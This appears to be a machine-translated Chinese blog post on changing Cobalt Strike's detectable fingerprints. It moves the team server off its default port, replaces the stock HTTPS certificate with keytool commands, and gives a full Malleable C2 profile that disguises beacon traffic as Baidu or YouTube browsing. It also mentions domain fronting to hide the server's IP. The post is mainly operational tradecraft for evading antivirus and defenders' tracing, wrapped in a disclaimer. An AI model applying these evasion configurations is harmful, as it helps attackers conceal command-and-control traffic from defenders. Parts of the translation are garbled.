当前位置:网站首页>Cobalt strike feature modification
Cobalt strike feature modification
2022-07-06 06:28:00 【zxl2605】
Fight in red and blue and hvv Wait, in case , We all use Cobalt Strike, Then it is also the focus of security companies , Follow msf similar , but CS Operation comparison MSF Easy to use , There is also a powerful plug-in library . that , Such a red tool , In terms of features, there must be some features in the security software feature library , So we need to modify its characteristics .
------ This article mainly explores CS Its own characteristics , Do not include Trojan horse free , In the future, I will write articles about the exemption from killing , It is also a record of learning , Welcome your guidance .
One 、CS Default port
CS The default port opened is 50050, When the blue team was analyzing , notice ip to open up 50050, Generally ban 了 , apparently CS The port of , therefore , We need to change 50050 port .
File on the server teamserver Internal modification ,
vi teamserver
Put the code at the bottom 50050 Change to another port , that will do
Two 、CS The fingerprint https Feature certificate modification
By default, we do not configure CS On certificate , It uses CS Self contained certificate , Let's not say why we need to modify , Let's first look at the contents of the default certificate
Use keytool.exe【 If there is a computer java Environmental Science , It is brought by itself. 】 open ,
keytool -list -v -keystore cobaltstrike.store
You need to enter a password , The default is 123456, If not 123456, You can try to open teamserver file , see
You can try it , I do not know! , The password doesn't matter , Later, we need to generate by ourselves .
This is original cobaltstrike.store file , All is CS features , Directly to , Killing .
At this point, we need to generate the certificate ourselves .
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias SuanSuan -dname "CN=Suan Suan, OU=Suan, O=Suan, L=LongZu, S=OO, C=OO"
Explain what the parameters mean :
CN=( First and last names ), OU=( Organization name ), O=( Organization name ), L=( City or area name ), ST=( State or province name ), C=( The two-letter country code for the unit )
among cobaltstrike.store For the newly generated keystore file ,-alias Specify alias ,-storepass pass and -keypass pass Specify the key ,-keyalg RSA Specify the principal public key algorithm ,-dname Specify the owner letter
According to the above information , We can generate a unique certificate by ourselves , Prevent previous certificate characteristics , Be investigated and killed .
Delete the original certificate after generating a new certificate , Put it in CS root directory , And we need to enable certificates :
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
cobaltstrike.store Name of the certificate generated for .
Reuse keytool Check it out. ,
keytool -list -v -keystore cobaltstrike.store
At this point, the certificate is already the certificate information we just set
At this time, the certificate is not fully effective , See below for details c2 To configure .
3、 ... and 、CS Of http Modification of service traffic characteristics
Our husband becomes a http Trojan file of service , Use wireshark Grab the bag to check the details
This packet is CS no http Data packets of , It's strange to request and return from packets , Too few parameters , and U-A So is the head IE Browser's , It should also be rarely used IE Well , So we still need to revise .
Use Malleable C2 Profile Customize CS Traffic characteristics ,
Reference items :https://github.com/xx0hcd/Malleable-C2-Profiles
Scalable command and control (helpsystems.com)
Configure according to the template file profile,
###global options###
set sleeptime "37500"; # Company ms
set jitter "35"; # Sleep jitter time , percentage 0-99
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69";#U-A Head customization
###SSl Options###
# If there is a certificate here, you can directly use the certificate generated by yourself , Remove the comments here , Comment the following code that generates the certificate , If not, use the following code to generate .
#https-certificate {
#set keystore "cs Inside .store file location ";
#set password ".store Certificate file key ";
#}
https-certificate {
set C "US"; # Alphabetic country code
set CN "Suan Suan"; # First and last names
set L "WU"; # The city name
set O "Suan Suan"; # Organization name
set OU "Suan Suan"; # Organization name
set ST "WU"; # Name of state or province
set validity "365"; # The certificate takes effect on
}
###CODE-SIGNER BLOCK###
code-signer{
# Used for signing Windows Executable and Windows Executable(S), Make sure Payload Uniformity
set keystore "cobaltstrike.store"; # Certificate file name
set password "123456"; # Password in certificate
set alias "baidu.com"; # Certificate alias
}
###HTTP-GET Block###
http-get {
set uri "/video /knowledge /douga /cinephile"; # Customize multiple url Request path , Separated by spaces
# Configure request parameters
client {
header "referer" "https://www.baidu.com/";
header "Host" "https://youtube.com/";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
header "Connection" "close";
metadata {
netbiosu; # netbios( Capitalization ) code
append "BV1kF411J7zG?spm_id_from=333.5.0.0"; # Append the parameter content with the suffix
parameter "file"; # Put the content in the new url Parameters in
prepend "v="; # Append the prefix of parameter content
header "Cookie"; # Add to HTTP Cookie In the head
}
}
# Response content
server {
header "Content-Type" "text/html; charset=utf-8";
header "content-encoding" "gzip";
header "set-cookie" "innersign=1; path=/; domain=.youtube.com/";
output {
base64;
print;
}
}
}
###HTTP-Post Block###
http-post {
set uri "/knowledge= /food="; # Cannot be associated with http-get Of url The request path is exactly the same
client {
header "Host" "https://youtube.com/";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
header "Connection" "close";
id {
netbios;
append "spm_id_from=333.5.0.0";
uri-append; # Append to url At the end of
}
output {
base64;
print;
}
}
server {
output {
base64;
print;
}
}
}
The above configuration file 【 Write according to the above instructions , There are many unreasonable places in the above document 】 Yes http And https Configuration of ,https Yes, enable the above certificate , Custom certificate characteristics ,http Is to make the transmitted packets more authentic , Increase the difficulty of tracing the source of the blue team .
Use the following command to enable profile The configuration file
./teamserver 192.168.1.109 suan c2.profile
Is in the CS Under normal startup, it will profile After the file is loaded .
Now let's take a look at the Trojan horse file http Service packets
This changed packet , We modify it ourselves according to the actual situation profile file , Make the data package more authentic .
Then there are https Well , Let's take a look https service
At this time, our certificate will come out , If in profile There is no configuration in the file https Words , Certificate information will not be displayed , All kinds of information are empty .
Four 、 Domain preposition
This technology is relatively good , I.e. configuration cdn service , Prevent traceability to ip, And I won't find it really ip, As a minor , Unable to record the domain name , So I'll add it later .
Statement : The technology involved in this paper 、 Ideas and tools are only used for learning and communication for safety purposes , No one can use it for illegal purposes , Otherwise, the consequences shall be borne by yourself !!!
边栏推荐
- 在uni-app中使用腾讯视频插件播放视频
- Simulation volume leetcode [general] 1296 Divide an array into a set of consecutive numbers
- 论文翻译英译中,怎样做翻译效果好?
- Drug disease association prediction based on multi-scale heterogeneous network topology information and multiple attributes
- Web界面元素的测试
- MySQL is sorted alphabetically
- Simulation volume leetcode [general] 1218 Longest definite difference subsequence
- [C language] qsort function
- G - Supermarket
- On weak network test of special test
猜你喜欢
云服务器 AccessKey 密钥泄露利用
D - How Many Answers Are Wrong
University of Manchester | dda3c: collaborative distributed deep reinforcement learning in swarm agent systems
How to extract login cookies when JMeter performs interface testing
Error getting a new connection Cause: org. apache. commons. dbcp. SQLNestedException
F - True Liars (种类并查集+DP)
JMeter做接口测试,如何提取登录Cookie
数据库隔离级别
Modify the list page on the basis of jeecg boot code generation (combined with customized components)
Convert the array selected by El tree into an array object
随机推荐
商标翻译有什么特点,如何翻译?
今日夏至 Today‘s summer solstice
E - food chain
Simulation volume leetcode [general] 1249 Remove invalid parentheses
基于JEECG-BOOT制作“左树右表”交互页面
win10无法操作(删除、剪切)文件
Win10 cannot operate (delete, cut) files
Pat (Grade B) 2022 summer exam
模拟卷Leetcode【普通】1143. 最长公共子序列
[C language] string left rotation
模拟卷Leetcode【普通】1062. 最长重复子串
联合索引的左匹配原则
[Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
JWT-JSON WEB TOKEN
leetcode 24. Exchange the nodes in the linked list in pairs
Grouping convolution and DW convolution, residuals and inverted residuals, bottleneck and linearbottleneck
F - True Liars (种类并查集+DP)
数据库-当前读与快照读
JMeter做接口测试,如何提取登录Cookie
国产游戏国际化离不开专业的翻译公司